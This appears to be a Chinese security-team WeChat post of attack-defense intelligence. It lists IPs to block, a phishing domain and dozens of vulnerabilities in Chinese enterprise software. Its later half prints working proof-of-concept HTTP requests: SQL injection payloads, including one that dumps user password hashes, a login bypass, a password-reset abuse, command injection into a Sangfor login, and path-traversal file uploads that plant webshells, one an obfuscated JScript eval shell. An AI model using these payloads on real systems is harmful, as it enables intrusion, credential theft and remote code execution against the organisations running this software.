免责声明
Drt安全
由于传播、利用本公众号Drt安全战队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号Drt安全战队及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!
封禁ip
121.28.82.203 153.99.123.243 223.104.40.206 58.248.180.249 223.104.40.206
172.174.8.243 213.32.122.82 223.104.42.110
52.56.224.130 60.221.59.173 223.104.42.177
60.223.233.250 65.49.20.117 223.104.41.119
140.205.96.208 212.64.40.129 223.104.39.80
钓鱼邮件
nuatdlh.cn
【漏洞总结】
1、海康威视综合安防前台文件上传漏洞
2、蓝凌OA前台代码执行漏洞
3、致远M3Server-xxxx反序列化漏洞
4、致远A8V8SP1SP2文件上传漏洞(1dav)
5、普元EOS 前台代码执行漏洞
6、金和OA sql注入
7、泛微E-Mobile任意用户登录(1day)
8、泛微E-Office10信息泄露后台+后台文件上传漏洞(Oday)很牛的组合漏洞
9、契约锁电子签章系统RCE(1day)
10、亿赛通电子文档平台文件上传漏洞
11、ldocview命令执行漏洞
12、jeesite代码执行漏洞Oday
13、LiveBOS文件上传漏洞
14、用友nc-cloud-任意文件写入
15、qax VPN 0day
16、xxIOA PWN
17、xxx准入PWN
18、sxf应用交付系统命令执行
19、协同办公文档(DzzOfffice)未授权访问
20、电子签章平台代码执行漏洞
21、泛微oa进后台漏洞
22、ucloud的未授权获取任意用户cookie
23、飞书客户端RCE漏洞
24、泛微EofficeV10前台RCE
25、来客推商城任意文件上传
26、天玥堡垒机Oday
27、明御运维审计与风险控制系统堡垒机任意用户注册28、协同管理系统存在SQL注入
29、泛微emobile注入漏洞30、拓尔思WCM任意命令执行漏洞
31、用友财务云任意文件上传漏洞
32、天眼0day(未证实)
33、绿盟sas安全审计系统任意文件读取
34、Smartbi身份认证绕过漏洞
35、泛微Eoffice10 sql注入
36、海康综合安防平台-Spring-ENV信息泄露-Restful api默认密钥漏洞
37、宏景4个注入2个上传
38、红帆OA一堆0day
39、泛微E-office do_excel组件存在任意文件写入漏洞
40、某御 Leadsec ACM管理平台SQL注入漏洞
41、H3C CVM 前台任意文件上传漏洞
42、通达OA登录认证绕过漏洞
43、TRS-MAS 测试文件远程命令执行漏洞
44、宝塔前台远程代码执行漏洞
45、某恒数据大脑 API 网关任意密码重置漏洞
46、通达OA系统V11.x版本远程代码执行漏洞
47、华天动力OA系统前台任意文件上传漏洞
48、PbootCMS v3.1.2 远程命令执行漏洞
49.金蝶OA云星空kdsvc远程命令执行漏洞
50.HiKVISION综合安防管理平台files任意文件上传漏洞
51.网神SecGate 360__0防火墙obj_app_upfile任意文件上传漏洞
52.网神SecSSL3600安全接入网关系统未授权访问 漏洞
53.用友移动管理系统uploadApkdo任意文件上传漏洞
Hillstone LMS 系统命令执行漏洞
天翼云网页防篡改系统命令执行漏洞
致远 OA 系统命令执行漏洞
致远0A 系统 V5-V6 模块命令执行漏洞
山石网科 BDR 系统 PHP 模块命令执行漏洞
H3C NX54 系统 web 模块信息泄露漏洞
镜捷 BG 易网关系统 patch. php 模块命令执行漏洞
H3C 虚拟授权管理系统系统 queryip模块命令执行漏洞
H3C 虚拟授权管理系统系统 web 模块命令执行漏洞
H3C综合日志审计平台系统webservice 模块命令执行漏洞
Logbase 堡垒机系统web 模块 SQL 注入漏洞
铣捷EG 易网关系统命令执行漏洞
镜捷 RG-UAC-6000-ISG 系统命令执行漏洞
镜捷云办公主机系统鉴权绕过模块命令执行漏洞
达云一卡通系统文件上传漏洞
1. 泛微 E-Cology 8、9SQL注入漏洞 POC
2. 金和OAC6-GetSqlData.aspxSQL注入漏洞
3. 用友畅捷通T+ SQL注入漏洞
4. ⻜企互联OA文件读取
5. 浪潮交易平台0day
6. 瑞友天翼应用虚拟化系统SQL注入漏洞
7. GitLab目录遍历漏洞
8. 猎鹰安全科技终端安全系统SQL注入漏洞XVE
9. 泛微E-Mobile6messageType.dosql注入
10. nginxWebUI
11. Net-NTLMv2窃取漏洞
12. Metabase未授权JDBC远程代码执行漏洞
13. 正方RCE
14. 正元EOS /default/jmx.jmx 反序列化
15. 正元EOS /default/remote.remote 反序列化
16. 锐捷 RG 系列路由器后台命令执行漏洞
17. 亿赛通任意文件写入0day
18. 大华智慧园区综合管理平台 deleteFtp 接口远程命令执行漏洞
19. 畅捷通T+ GetStoreWarehouseByStore RCE
20. 大华智慧园区任意密码读取漏洞
21. 泛微 sql 注入漏洞2
22. 用友时空 KSOA TaskRequestServlet sql 注入漏洞
23. 金蝶 K3ERP 系统 CusShareService SQL 注入
24. 用友时空 KSOA TaskRequestServlet sql 注入漏洞
25. 金和 OA C6 GetSqlData.aspx SQL注入漏洞
请各单位密切关注并及时采取相应措施以确保系统和数据的安全。
223.104.39.80
223.104.40.206223.104.40.206223.104.40.206
禅道 16.5 router.class.php SQL注入漏洞
POST /user-login.html
account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23
辰信景云终端安全管理系统 login SQL 注入漏洞 POC
POST /api/user/login
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(s
elect*from(select+sleep(3))a)
汉得 SRM tomcat.jsp 登录绕过漏洞 POC
/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&da
taValue=1
网神 SecSSL 3600 安全接入网关系统 任意密码修改漏洞 POC
POST /changepass.php?type=2
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff;
last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=
Test123!@&repassword=Test123!@
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 POC
POST /?g=obj_app_upfile HTTP/1.1Host: x.x.x.xAccept: */*Accept
Encoding: gzip, deflateContent-Length: 574Content-Type: multipart/form
data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQcUser-Agent:
Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data;
name="MAX_FILE_SIZE"
10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition:
form-data; name="upfile"; filename="vulntest.php"Content-Type:
text/plain
<?php php 马?>
------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data;
name="submit_post"
obj_app_upfile------WebKitFormBoundaryJpMyThWnAxbcBBQcContent
Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445------
WebKitFormBoundaryJpMyThWnAxbcBBQc--
深信服应用交付系统命令执行漏洞 POC
POST /rep/login
Host:10.10.10.1:85
clsMode=cls_mode_login%0Als%0A&index=i
ndex&log_type=report&loginType=account&page=
广联达oa sql注入漏洞 POC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
广联达oa 后台文件上传漏洞 POC
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: */*
Origin: http://10.10.10.1
Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie:
Connection: close
Content-Length: 421
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text
<%@ Page Language="Jscript" Debug=true%>
<%
var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
var GFMA=Request.Form("qmq1");
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--
HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC
POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--
HiKVISION 综合安防管理平台 report 任意文件上传漏洞 POC
POST /svm/api/external/report HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--
关注不迷路
原文始发于微信公众号(Drt安全战队):【攻防情报】关注实时整理8.10
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论